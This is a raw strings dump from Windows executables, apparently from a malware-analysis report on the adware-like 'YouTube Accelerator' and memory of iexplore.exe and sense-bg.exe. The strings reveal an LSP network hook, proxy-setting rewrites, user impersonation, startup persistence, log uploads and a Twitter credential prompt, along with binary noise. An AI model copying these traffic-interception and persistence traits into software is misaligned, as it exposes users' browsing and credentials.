    [CConfig::IsTestingMode] ___Error TestingMode = %d (XML)
    [CConfig::IsTestingMode] TestingMode = %d (XML)
    [CConfig::SetTestingMode] ___Error TestingMode = %d (XML)
    [CConfig::SetTestingMode] TestingMode = %d (XML)
    [CConfig::GetBrandPort] BrandPort = %d
    br_port
    CConfig::SetCurrentUserKey
    ReportCommFailed
    [CConfig::SetSendLogFiles] Status = %d
    [CConfig::SetSendInstLogFileOnly] Status = %d
    [CConfig::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
    [CConfig::SetTracerOff] ___Error GetRegistryKeys
    [CConfig::SetBackup] ___Error GetRegistryKeys
    [CConfig::SetBackup] Status = %d
    [CConfig::AddToLearningDomainsList] ___Error adding the domain %s to the learning domains list
    [CConfig::AddToLearningDomainsList] The domain %s was added to the learning domains list
    [CConfig::IsXBoxMode] Status = %d
    [CConfig::SetTracerOn] ___Error GetRegistryKeys
    [CConfig::SetTracer] Status = %d
    B%sLow\%s\
    %C:\Users\Public\Documents\%s\%s\
    %s\%s\%s\
    %s\Application Data\%s\%s\
    [CCoreConfig::InitConfig] Product Name %s UseRegistry %d
    You are using %s - Translated by:
    [CFileResource::Load] ___Error SizeofResource: %d
    [CFileResource::Load] ___Error LockResource: %d
    [CFileResource::Load] ___Error LoadResource: %d
    [CFileResource::Load] ___Error FindResource: %d
    [CFileResource::Load] %s
    [CFileResource::Extract] ___Error Write: %d
    [CFileResource::Extract] ___Error Create: %d
    [CFileResource::Extract] %s
    [CFileResource::ExtractAll] ___Error ExtractResourceFromList: %x
    [CFileResource::ExtractAll] ___Error EnumResourceTypes: %d
    ListenPort
    [EngineConfiguration::GetCurrentUserKey] User Key: %X
    [EngineConfiguration::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
    HttpRedirectProxyPort
    HttpRedirectProxyDomain
    [CEventsThread::SetTimeoutResolution] From: %d -> To: %d
    [CEventsThread::WaitForMultipleEvents] Released on Signaled: %d ms
    [CEventsThread::WaitForMultipleEvents] Released on Timeout: %d ms
    [CEventsThread::WaitForMultipleEvents] ___Error MsgWaitForMultipleObjectsEx. LE: %d
    [CEventsThread::WaitForMultipleEvents] TID=%X
    [CEventsThread::CreateNamedEvent] OpenEvent. LE: %d
    [CEventsThread::CreateNamedEvent] ___Error OpenEvent: LE: %d
    [CEventsThread::CreateNamedEvent] ___Error CreateEvent. LE: %d. Try OpenEvent...
    [CEventsThread::Start - Leave] TID=%X
    [CEventsThread::Start] ___Error - Failed to create thread: %X
    [CEventsThread::Stop - Leave] TID=%X
    [CEventsThread::Stop - Enter] TID=%X
    B[CEventsThread::CallProcessTimeoutRoutines] ___Error Invalid Event Entry: %d, Timeout: %d
    [CEventsThread::AlertEvent] ___Error SetEvent failed: %d
    [CEventsThread::AlertEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::AlertEvent] ___Error Not found Event: %d
    [CEventsThread::SetGlobalEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::SetGlobalEvent] ___Error Not found Event: %d
    [CEventsThread::SetGlobalEvent] Event: %d
    [CEventsThread::ResetEvent] ___Error ResetEvent failed: %d
    [CEventsThread::ResetEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::ResetEvent] ___Error Not found Event: %d
    [CEventsThread::ResetEvent] Event: %d
    [CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Entry: %d
    [CEventsThread::CallProcessEventRoutines] ___Error Invalid Event Index: %d
    [CEventsThread::RemoveEvent] ___Error CloseHandle failed: %d
    [CEventsThread::RemoveEvent] ___Error Invalid Event Entry: %d
    [CEventsThread::RemoveEvent] ___Error Not found Event: %d
    [CEventsThread::RemoveEvent] Event: %d
    [CEventsThread::Cleanup] ___Error CloseHandle(0x%p) failed: %d
    [CEventsThread::Cleanup] Closing Handle: %d
    [CEventsThread::WaitEvent] TID=%X
    [CEventsThread::Work] TID=%X - Exit !!!
    [CEventsThread::Work] WAIT_ABANDONED - %d
    [CEventsThread::Work] TID=%X
    B[CEventsThread::AddEvent] ___Warning event handle already exists %d
    [CEventsThread::AddEvent] ___Error invalid event handle %d
    [CExecuteUpdate::OnDeserialize] ___Error get m_ShowCmd
    [CExecuteUpdate::OnDeserialize] ___Error get m_Directory
    [CExecuteUpdate::OnDeserialize] ___Error get m_Parameters
    [CExecuteUpdate::OnDeserialize] ___Error get m_Operation
    [CExecuteUpdate::OnDeserialize] ___Error get m_File
    [CExecuteUpdate::RunUpdate] ___Error ShellExecute: %s, Faild: %d
    http_port
    user.js
    user_pref("network.proxy.
    autoconfig_url
    Windows XP Firewall (ICF)
    SOFTWARE\McAfee.com\Personal Firewall
    DAP.EXE
    Windows Security Alert
    %d.%d.%d.%d
    HttpHandleAll
    HttpWorkerBufferLimit
    HttpListenPort
    HttpListenIP
    .html
    \winhlp32.exe
    [CIEInternetProxySettings::RetriveProxyConfiguration - Exit] list.pOptions == NULL
    [CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
    [CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
    [CIEInternetProxySettings::ApplyProxyConfiguration] InternetSetOption() - Failed: %d
    [CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %d
    [CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %d
    [CIEInternetProxySettings::IsOptionIncluded] NOT Found - Option: %d, Value: %s
    [CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: %s
    [CIEInternetProxySettings::IsOptionIncluded] Found - Option: %d, Value: NULL
    [CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_REFRESH ) - Failed: %d
    [CIEInternetProxySettings::Refresh] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
    [CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption() - Failed: %d
    [CIEInternetProxySettings::SetProxyConfigScript] list.pOptions == NULL
    [CIEInternetProxySettings::GetCurrentUserKey] User Key: %p
    [CIEInternetProxySettings::GetCurrentUserKey] ___Error spIImpersonateThread == NULL
    [CIEInternetProxySettings::SetProxyConfigScript] InternetSetOption( INTERNET_OPTION_SETTINGS_CHANGED ) - Failed: %d
    http=
    [CIEInternetProxySettings::Save] %s - %s = %s
    [CImpersonate::Impersonate] ImpersonateLoggedOnUser - Error: %d
    [CImpersonate::Impersonate] Impersonated: %d
    [CImpersonate::Revert] RevertToSelf - Error: %d
    [CImpersonate::Revert] Impersonated: %d
    [CImpersonate::Cleanup] Impersonated: %d
    [CImpersonate::GetUserSID] LookupAccountNameW failed. GetLastError returned: %d
    [CImpersonate::GetUserSID] The SID for %s is invalid.
    [CImpersonate::GetUserSID] Not Enough Memory: %d
    [CImpersonate::SetPrivilege] AdjustTokenPrivileges - Error: %d
    [CImpersonate::SetPrivilege] LookupPrivilegeValue - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] - The function does not support Windows Vista and Windows 98
    [CImpersonate::OpenCurrentUserDesktop] OpenDesktop - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] OpenInputDesktop - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] SetProcessWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] OpenWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] GetProcessWindowStation - Error: %d
    [CImpersonate::OpenCurrentUserDesktop] - The function does not support MAC
    [CImpersonate::CreateProcessAsCurrentUser] CreateProcessAsUser - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] CreateEnvironmentBlock - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] AddAceToDesktop - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] AddAceToWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] GetLogonSID - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] DuplicateTokenEx - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] OpenDesktop - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] SetProcessWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] OpenWindowStation - Error: %d
    [CImpersonate::CreateProcessAsCurrentUser] GetProcessWindowStation - Error: %d
    [CImpersonate::AddAceToWindowStation] SetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToWindowStation] SetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToWindowStation] CopySid - Error: %d
    [CImpersonate::AddAceToWindowStation] AddAce - Error: %d
    [CImpersonate::AddAceToWindowStation] GetAce - Error: %d
    [CImpersonate::AddAceToWindowStation] GetAclInformation - Error: %d
    [CImpersonate::AddAceToWindowStation] GetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToDesktop] SetUserObjectSecurity - Error: %d
    [CImpersonate::AddAceToDesktop] SetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToDesktop] AddAccessAllowedAce - Error: %d
    [CImpersonate::AddAceToDesktop] AddAce - Error: %d
    [CImpersonate::AddAceToDesktop] GetAce - Error: %d
    [CImpersonate::AddAceToDesktop] GetSecurityDescriptorDacl - Error: %d
    [CImpersonate::AddAceToDesktop] GetUserObjectSecurity - Error: %d
    [CImpersonate::OpenCurrentUserKey] LoadUserProfile - SUCCESS
    [CImpersonate::OpenCurrentUserKey] LoadUserProfile failed - Error: %d
    [CImpersonate::GetLogonUserName] GetLogonUserName - Error: %d
    [CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - Error: %d
    [CImpersonate::OpenCurrentUserKey] RegOpenCurrentUser - SUCCESS
    [CImpersonate::OpenCurrentUserKey] Impersonated: %d
    [CImpersonate::FindLoggedOnUser] Process32First - Error: %d
    [CImpersonate::FindLoggedOnUser] OpenProcess - Error: %d
    [CImpersonate::FindLoggedOnUser] OpenProcessToken - Error: %d
    [CImpersonate::FindLoggedOnUser] CreateToolhelp32Snapshot failed - Error: %d
    SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    explorer.exe
    [CImpersonate::FindLoggedOnUser] Impersonated: %d
    [CImpersonate::GetLogonUserName] Name: %s
    [CImpersonate::GetLogonUserName] GetUserName - Error: %d
    [CImpersonateThread::NotifyImpersonateLogon] Time: %d
    [CImpersonateThread::NotifyImpersonateLogoff] Time: %d
    [CImpersonateThread::ProcessEvent] CreateProcess - CmdLine: %s, AppName: %s, ShowCmd: %d
    [CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(TRUE), LE: %d
    [CImpersonateThread::Start ] ___Error SetConsoleCtrlHandler(FALSE) failed: %d
    [CImpersonateThread::CreateProcess] CmdLine: %s, AppName: %s, ShowCmd: %d
    Name: %s
    Path: %s
    Version: %s
    %s_%d.log
    CSLogReportEventThread::DoPacLogFiles] Zip file created.
    *.bak
    CSLogReportEventThread::DoPacLogFiles] ___Error FindFirstFile( %s ): %d
    *.log
    Config.xml
    CSLogReportEventThread::DoPacLogFiles] ___Error to Create Zip file.
    BakLspCommTest.zip
    LspCommTest.zip
    [CSLogReportEventThread::DoPostZipFile] ___Error POST FAILED. LE: %X
    [CSLogReportEventThread::DoPostZipFile] POST SUCCEEDED
    http://online.@[email protected]/online/CommunicationTestFailed.aspx
    [CSLogReportEventThread::DoPostZipFile] Trying to POST...
    [CSLogReportEventThread::DoPostZipFile] ___Error CHttp to Connect: %X, Server: %s
    http://online.@[email protected]/online/
    CSLogReportEventThread::DoPostZipFile] ___Error CFile64 to get Zip file length.
    CSLogReportEventThread::DoPostZipFile] ___Error CFile64 to open file: %s
    A[ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - Wait: %d
    [ProxySettingsConfiguration::RestoreOriginalSettings] ___Error ApplyIEProxySettings - ProcessCommand: %d
    [ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - Wait: %d
    [ProxySettingsConfiguration::SaveApplied] ___Error RetrieveIEProxySettings - ProcessCommand: %d
    [ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - Wait: %d
    [ProxySettingsConfiguration::SaveOriginal] ___Error RetrieveIEProxySettings - ProcessCommand: %d
    [ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - Wait: %d
    [ProxySettingsConfiguration::RetriveExisting] ___Error RetrieveIEProxySettings - ProcessCommand: %d
    [ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - Wait: %d
    [ProxySettingsConfiguration::SetProxyConfigScript] ___Error SetProxyConfigScript - ProcessCommand: %d
    SOFTWARE\GOOBZO\YouTube Accelerator\%s\Original
    SOFTWARE\GOOBZO\YouTube Accelerator\%s\Current
    M[CRegistrationMgr::IsTrialVersion]%d
    exp=%d
    ins=%d
    Dur=%d
    [CRegistrationMgr::SetTrial] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::UpdateTrialParams] ___Error XMLNode::emptyNode %s
    Trial.dat
    Trial_QA.xml
    [CRegistrationMgr::StartTrial] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode .%d
    [CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetBoolNagFlagTrialExpAcceleration] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::HandleTrialScenario] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::HandleTrialScenario] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode .%d
    [CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetBuyNowDailyString] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetRotatedString] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetRotatedString] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetContinueTrialDailyString] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetContinueTrialDailyString] ___Error XMLNode::emptyNode %s
    (%d days left)
    DAYURL
    [CRegistrationMgr::GetDailyUrl] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetDailyUrl] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetDailyUrl]
    [CRegistrationMgr::GetContinueTrialDailyUrl] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetContinueTrialDailyUrl] ___Error XMLNode::emptyNode %s
    [CRegistrationMgr::GetContinueTrialDailyUrl]
    [CRegistrationMgr::GetContinueTrialBtnTxt] ___Error XMLNode::emptyNode %d
    [CRegistrationMgr::GetContinueTrialBtnTxt] ___Error XMLNode::emptyNode %s
    xmldb.dll
    config.xml
    RtmpListenPort
    MiTunes.exe
    [CSA_GUIApp::RegisterCommTestEvents] ___Error m_pPipeEventThread == NULL
    [CSA_GUIApp::UnRegisterCommTestEvents] ___Error m_pPipeEventThread == NULL
    [CSA_GUIApp::IsTrial] m_bIsTrial = %d
    User%d
    [CSA_GUIApp::GoToURL] ___Error FindExecutable failed url = %s
    [CSA_GUIApp::GoToURL] ___Error The specified file was not found
    YouTubeAccelerator.exe
    [CSA_GUIApp::IsTestingSucceeded] InstalledLspVersion: %s, SBLSP: %s
    ytalsp.dll
    [CSA_GUIApp::UpdateRunOnStartup] Creating Run on startup registry key for %s
    [CSA_GUIApp::RunUnwise] ___Error WaitForSingleObject: %d
    [CSA_GUIApp::RunUnwise] ___Error CreateProcess: %d, Command: %s
    unwise.exe
    [CSA_GUIApp::GetTempDir] ___Error GetTempPath: %d
    [CSA_GUIApp::GetTempDir] Folder: %s
    [CSA_GUIApp::RunFromTemp] ___Error CreateProcess: %d, Command: %s
    %s %s
    [CSA_GUIApp::RunFromTemp] ___Error Copy: %s - to Temp: %s
    YoutubeAcceleratorService.exe
    D[CSA_GUIApp::SetTestingSucceeded] InstalledLspVersion: %s
    [CSA_GUIApp::UpdateResourceDll] ___Error Removing %s. Err = %d
    [CSA_GUIApp::UpdateResourceDll] ___Error Renaming %s to %s. Err = %d
    [CSA_GUIApp::UpdateResourceDll] ___Error ExtractDataFromResFile: %x (Temp)
    [CSA_GUIApp::UpdateResourceDll] VAResTemp.dll file Path: %s
    Res\VARes_%d\
    [CSA_GUIApp::UpdateResourceDll] ___Error ExtractDataFromResFile: %x
    [CSA_GUIApp::UpdateResourceDll] ___Error CreateDirectoryRecursivlyFromPath: %x
    [CSA_GUIApp::UpdateResourceDll] Resources Folder: %s
    VARes_%d\
    [CSA_GUIApp::UpdateResourceDll] DllVer: %d, RegVer: %d, TmpVer: %d
    ResOld.dll
    ResTemp.dll
    [CSA_GUIApp::UpdateResourceDll] ___Error GetPath: %x
    [CSA_GUIApp::RunFinishHtml] GotoURL status is %d
    [CSA_GUIApp::RunFinishHtml] Finish URL is : %s
    http://@BRAND_ID@.@[email protected]/finishinstall?
    http://rep.@[email protected]/app/ping.ashx
    engine.dll
    [CSA_GUIApp::FormatURL] URL: %s
    &TrialDaysLeft=%d
    ?V=%s&pr=%d&Beta=%d&Emode=%d
    [CSA_GUIApp::InitInstance] __Error m_pPipeEventThread = NULL
    [CSA_GUIApp::InitInstance] Uninstall URL - GotoURL status is %d
    [CSA_GUIApp::InitInstance] ___Error to load VideoAccelerator - CreateDialog Failed: %d
    VA???.lng
    [CSA_GUIDlg::OnShowTrayIcon] - m_TrayIcon.ShowIcon() Failed !!!
    [CSA_GUIDlg::SetOpenMainWindowDisableFlag]bVal = %d
    %s&OEM=%s
    http://@BRAND_ID@.@[email protected]/support/help
    VIDEO_ACCELERATOR.MHT
    [CSA_GUIDlg::ShowMenora] ___Error No lending url
    [CSA_GUIDlg::OnMenoraOpen] ___Error url empty
    [CSA_GUIDlg::RunLspInstaller] ___Error - LSP installer returned after Timeout, error %d
    [CSA_GUIDlg::RunLspInstaller] ___Error - LSP installer returned failure %d, error %d
    [CSA_GUIDlg::RunLspInstaller] Wait for LSP Installer process to complete for %d milsecs...
    [CSA_GUIDlg::RunLspInstaller] Executing LSP Installer process: %s
    -b -d %s
    lspinst2.exe
    lspinst.exe
    CSABaseWebWindow::OnBeginDrag
    CSABaseWebWindow::OnStopDrag
    ECSABaseWebWindow::Navigate : url = %s
    CSABaseWebWindow::OnNavigateError : url = %s
    CSABaseWebWindow::OnNavigateComplete : url = %s
    CSABaseWebWindow::OnDocumentComplete : url = %s
    CSANotifierWebWindow::SetMetaData GOT 'height'
    CSANotifierWebWindow::SetMetaData GOT 'width'
    [CSANotifierWebWindow::ReplaceLNGTags] replacing "%s" with "%s" = "%s" from String table
    [CSANotifierWebWindow::ReplaceLNGTags] ___Error no "%s" in String table, putting "%s"
    [CSANotifierWebWindow::ReplaceLNGTags] ALT case replacing  at "%s" with "%s" = "%s" from String table
    [CSANotifierWebWindow::ReplaceLNGTags] ___Error ALT case no "%s" in String table, putting "%s" instead of  at "%s"
    [CSANotifierWebWindow::ReplaceLNGTags] length %d
    [CSANotifierWebWindow::ReplaceLNGTags]
    [CSANotifierMgr::GetAvaliableNotifier] Message %d is already displayed
    ItweetMessage.mht
    SilentTestFailed.mht
    SilentTestSucceeded.mht
    ITUNESMESSAGE.MHT
    http://www.fileratings.com/video/@PRODUCT_DOMAIN@/12/buyiTunes.asp
    OldDriver.mht
    Activation_Expired.mht
    noupdates.mht
    exiting.mht
    va_on.mht
    va_off.mht
    dl_update.mht
    update.mht
    HD_DISABLED.MHT
    ACCELERATION_NOT_SUPPORTED.MHT
    now_accelerating.mht
    ACCELERATION_NOT_SUPPORTED_CHECKBOX
    ACCELERATION_NOT_SUPPORTED_BUTTON_OK
    %d days left.
    %d Days left
    <d/d/%d d:d:d::d 0x%X>
    [SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
    [SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
    [SbTracer::RecursiveCreateDirectory] Directory: %s
    [SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
    [SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
    [SbTracer::FormatFilePath] Log Path: %s
    [SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
    [SbTracer::FormatFilePath] ___Warning - No Log folder: %s
    [SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
    \StringFileInfo\x\%s
    [SbTracer::ReadConfiguration] Trace Max Size: %d
    [SbTracer::ReadConfiguration] Trace Time Stamp: %d
    [SbTracer::ReadConfiguration] Trace Time Limit: %d
    [SbTracer::ReadConfiguration] Trace Backup: %d
    [SbTracer::ReadConfiguration] Trace Destination: %d
    [SbTracer::ReadConfiguration] Trace Level: %d
    [SbTracer::BackupTraceFile] %s
    [SbTracer::OpenTraceFile] Done %s
    [SbTracer::OpenTraceFile] ___Error: %d, File: %s
    [SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] SetSecurityDescriptorDacl failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeSecurityDescriptor failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the trusted owner. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the Everyone group. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AddAccessAllowedAce failed for the queue owner. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] InitializeAcl failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetLogonSID failed. Error code: 0x%X
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] AllocateAndInitializeSid failed. GetLastError returned: %d
    [CImpersonateSecurityDescriptor::CreateSecurityDescriptor] GetTokenInformation failed. GetLastError returned: %d
    [CSerializable::GetField] ___Error - Vector size missmatch. Code: %d
    F[CServiceController::ChangeStartType] ___Error ChangeServiceConfig failed: %d
    [CServiceController::ChangeStartType] ___Error OpenService: %s, failed: %d
    [CServiceController::ChangeStartType] ___Error OpenSCManager failed: %d
    [CServiceController::ChangeStartType] Name: %s
    [CServiceController::ExecuteServer] Exit
    [CServiceController::ExecuteServer] Enter
    [CServiceController::ServiceMain] ___Error SetServiceStatus Failed: %d
    [CServiceController::ServiceMain] ___Error RegisterServiceCtrlHandler Failed: %d
    [CServiceController::UpdateServiceDespatchTable] ___Error Exception StartServiceCtrlDispatcher Failed: %d
    [CServiceController::UpdateServiceDespatchTable] ___Error StartServiceCtrlDispatcher Failed: %d
    [CServiceController::UpdateServiceDespatchTable] Enter, %s
    [CServiceController::Install] ___Error OpenService Failed: %d
    [CServiceController::Install] ___Error QueryServiceStatus Failed: %d
    [CServiceController::Install] ___Error CreateService Failed: %d
    [CServiceController::Install] ___Error OpenSCManager Failed: %d
    %s -%s -%s
    %s\%s
    [CServiceController::Install] ___Error GetModuleFileName Failed: %d
    [CServiceController::Remove] ___Error OpenService Failed: %d
    [CServiceController::Remove] ___Error OpenSCManager Failed: %d
    [CServiceController::GetStatus] ___Error QueryServiceStatus Failed: %d
    [CServiceController::GetStatus] ___Error OpenService Failed: %d
    [CServiceController::GetStatus] ___Error OpenSCManager Failed: %d
    [CServiceController::Start] The service %s was started
    [CServiceController::Start] ___Error StartService Failed: %d
    [CServiceController::Start] ___Error OpenService Failed: %d
    [CServiceController::Start] ___Error OpenSCManager Failed: %d
    [CServiceController::Start] Going to start the service %s
    [CServiceController::Stop] The service %s was stopped
    [CServiceController::Stop] ___Error ControlService Failed: %d
    [CServiceController::Stop] ___Error OpenService Failed: %d
    [CServiceController::Stop] Going to stop the service %s
    [CServiceController::Stop] ___Error SetServiceStatus Failed: %d
    [CServiceController::GetArgsFromCmd] Exit
    [CServiceController::GetArgsFromCmd] m_bSCMCmd = TRUE
    [CServiceController::GetArgsFromCmd] Enter
    [CServiceController::RunCommand] Args: %s
    I[CSettingDlg::LoadEngine] ___Error to Create IHttpEngineConfiguration
    [CSettingDlg::OnInitDialog] ___Error to Create IHttpEngineConfiguration
    WININET.DLL
    Gkernel32.dll
    d/d/%d d:d:d::d
    [CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
    "%s" "%s"
    "%s" %s
    [CVA_Alert::OnDeserialize] ___Error get m_LandingUrl
    [CVA_Alert::OnDeserialize] ___Error get m_URL
    [ACCELINFO::OnDeserialize] ___Error get URL
    SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    zvl=%s&
    %s?e=%s
    SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
    Hcomctl32.dll
    Hcomdlg32.dll
    Hshell32.dll
    accKeyboardShortcut
    f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
    Afx:%p:%x:%p:%p:%p
    Afx:%p:%x
    commctrl_DragListMsg
    Hf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
    Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    Software\Microsoft\Windows\CurrentVersion\Policies\Network
    Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
    ntdll.dll
    %s%s.dll
    f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
    f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
    mfcm90u.dll
    f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
    Jf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
    I.INI
    I.com
    DLG_%u
    PID%u
    les\YouTube Accelerator\YouTubeAccelerator.exe
    Important:
    Port:
    Contact Our Support
    See supported video sites
    Join Today!
    2.0.5.3
    Watch YouTube and other web videos without pauses.
    Twitter login
    Password:
    Enter your username and password for Twitter:
    %s
    Communications test failed.JWe believe it might be a Security / Firewall issue.
    For additional information, contact our support at:
    http://@[email protected]/support/
    http://@[email protected]/support/VWe believe the problem might be caused by Karspersky antivirus.
    http://@[email protected]/support/
    Enter port,Please enter a valid Port number (0 - 65536)UPlease enter a valid Domain name or IP address
    (e.g. sample.proxy.com, 192.168.1.100)
    @BRAND@ - Settings error!3{lX-X-x-XX-XXXXXX}!Get the premium video experience.!The premium web video experience.6Enjoy HD videos and iTunes purchases without the wait.P@BRAND@ Premium
    lets you enjoy HD videos and iTunes downloads without the wait.XPlease Approve @BRAND@ in your Firewall and/or Antivirus to complete the Installation...
    @BRAND@ECheck out the video %s from %s I'm watching it smoothly with @[email protected] out the video from %s I'm watching it smoothly with @BRAND@.!You are using %s - Translated by:
    @BRAND@ is accelerating...#Restart required to change languageeYou have selected %s as VA's interface language.
    @BRAND@ Trial version!The ultimate web video experienceN@BRAND@ lets you enjoy smooth web videos and iTunes download without the wait.
    !The ultimate web video experienceN@BRAND@ lets you enjoy smooth web videos and iTunes download without the wait.
    Normal video acceleration\Watch smooth web videos with bit rates up to 100 KBps without buffering & interruptions.
    HD Video AccelerationNStop waiting while you watch HD web videos with high bit rates above 200 KBps.
    Supported Video Sites
    Every web video just got better
    All Files (*.*)
    No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
    Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
    Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
    #Unable to load mail system support.
    3.3.8.9

    iexplore.exe_3568:

    %?9-*09,*19}*09
    .text
    `.data
    .rsrc
    msvcrt.dll
    KERNEL32.dll
    NTDLL.DLL
    USER32.dll
    SHLWAPI.dll
    SHDOCVW.dll
    Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
    IE-X-X
    rsabase.dll
    System\CurrentControlSet\Control\Windows
    dw15 -x -s %u
    watson.microsoft.com
    IEWatsonURL
    %s -h %u
    iedw.exe
    Iexplore.XPExceptionFilter
    jscript.DLL
    mshtml.dll
    mlang.dll
    urlmon.dll
    wininet.dll
    shdocvw.DLL
    browseui.DLL
    comctl32.DLL
    IEXPLORE.EXE
    iexplore.pdb
    ADVAPI32.dll
    MsgWaitForMultipleObjects
    IExplorer.EXE
    IIIIIB(II<.Fg
    7?_____ZZSSH%
    )z.UUUUUUUU
    ,....Qym
    ````2```
    {.QLQIIIKGKGKGKGKGKG
    ;33;33;0
    8888880
    8887080
    browseui.dll
    shdocvw.dll
    6.00.2900.5512 (xpsp.080413-2105)
    Windows
    Operating System
    6.00.2900.5512

    sense-bg.exe_1088:

    .text
    `.rdata
    @.data
    .rsrc
    Lj.hD
    ?%u4W
    j.Yf;
    _tcPVj@
    .PjRW
    /windowswitchwithtab=%d
    HttpRequest Code
    window.appAPIinternal = appAPIinternal;
    if (typeof console !== "undefined" && typeof console.error !== "undefined") {
    console.error("---- JS Exception from:
    application/x-www-form-urlencoded
    /windowswitch=%d
    iexplore.exe
    openUrl error=
    msgObj
    pacFileUrl
    %userprofile%
    1.2.1
    Invalid HTTP(S) status code
    https://
    urlRedirected
    InternetCrackUrl Failed
    port
    HttpOpenRequest Failed
    HttpSendRequest Failed with:
    HttpQueryInfo Failed
    originUrl
    redirectUrl
    httpCode
    ntdll.dll
    GetProcessHeap
    - Exception message: '   e.message);}}catch(e1){}}
    }catch(e){try{if(console && console.log){console.log('Caught an exception from:
    kernel32.dll
    Advapi32.dll
    RegOpenKeyTransactedA
    %d.%d.%d.%d
